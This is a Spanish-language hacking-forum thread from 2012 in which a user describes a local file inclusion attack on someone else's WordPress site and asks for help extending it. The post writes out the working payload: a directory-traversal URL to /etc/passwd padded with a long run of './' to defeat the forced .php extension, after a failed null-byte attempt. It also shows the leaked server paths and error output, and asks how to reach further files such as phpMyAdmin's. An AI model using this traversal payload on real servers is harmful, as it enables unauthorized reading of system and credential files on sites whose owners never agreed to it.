elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  ENTRA... LFI duda... quien pueda ayudar con esto
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ENTRA... LFI duda... quien pueda ayudar con esto  (Leído 2,410 veces)
coldalfred

Desconectado Desconectado

Mensajes: 5


Ver Perfil
ENTRA... LFI duda... quien pueda ayudar con esto
« en: 5 Abril 2012, 02:22 am »

hola espero peudan ayudarme o entiendan del tema tengo esto en X web afectada es un LFI

Al intentar un simple ../../etc/passwd me tira este error

Warning: require_once(lang/../etc/passwd.php) [function.require-once]: failed to open stream: No such file or directory in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.111.xxx/single.php on line 6

muy seguramente tiene que tener esto algo como esto
" include($_GET['page'] . '.php'); " en el codigo donde permite solo .php

luego intente con un NULL bye %00 pero estaba tambien con filtro dejandomelo en \0 asi que decidi usar "fuerza automatizada" jajaja y me saco esto.


http://webafectada.com/123123/?lang=de&lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.



con eso pude ver el passwd y ya no pedia el .php al ultimo como extension me parecio algo extraño y mire el error a ver si lo logran entender:


Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxxxxx/header.php on line 3

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.1111.xxx/header.php on line 3


asi logre ver el /etc/passwd pero deseo saber PORQUE? que quiere decir eso? y porque cuando quiero ver otros archivos mas que todo fuera del etc o fuera de su directorio no logro verlo ellos tienen un PHPMYADMIN y no logro verlos aun sabiendo el path completo.

Si alguien puede entenderlo mejor el porque de ese error me ayudaria mucho  ;-)
« Última modificación: 5 Abril 2012, 06:30 am por coldalfred » En línea

h3ct0r

Desconectado Desconectado

Mensajes: 108


Hail to the king baby!


Ver Perfil
Re: ENTRA... LFI duda... quien pueda ayudar con esto
« Respuesta #1 en: 9 Abril 2012, 00:49 am »

Hola coldalfred, que programa estas usando? Me parece bastante curioso ese método!
En línea

[img[/img]
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguien q me pueda ayudar?
Ingeniería Inversa
alegriahoy 3 2,723 Último mensaje 21 Febrero 2009, 20:12 pm
por Revolutions
A quien me pueda ayudar
Juegos y Consolas
emil809 3 1,546 Último mensaje 1 Agosto 2010, 20:42 pm
por emil809
Zuckerberg entra en política para ayudar a un candidato republicano
Foro Libre
wolfbcn 0 736 Último mensaje 25 Enero 2013, 14:32 pm
por wolfbcn
QUIEN ME PUEDE AYUDAR CON ESTO?? « 1 2 »
Dudas Generales
romy_03 10 3,402 Último mensaje 20 Mayo 2013, 21:08 pm
por simorg
Quien tiene el Script Hl envelope 1 y 2 que lo pueda compartir por favor
Ingeniería Inversa
tomrafael 0 568 Último mensaje 31 Marzo 2020, 07:59 am
por tomrafael
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines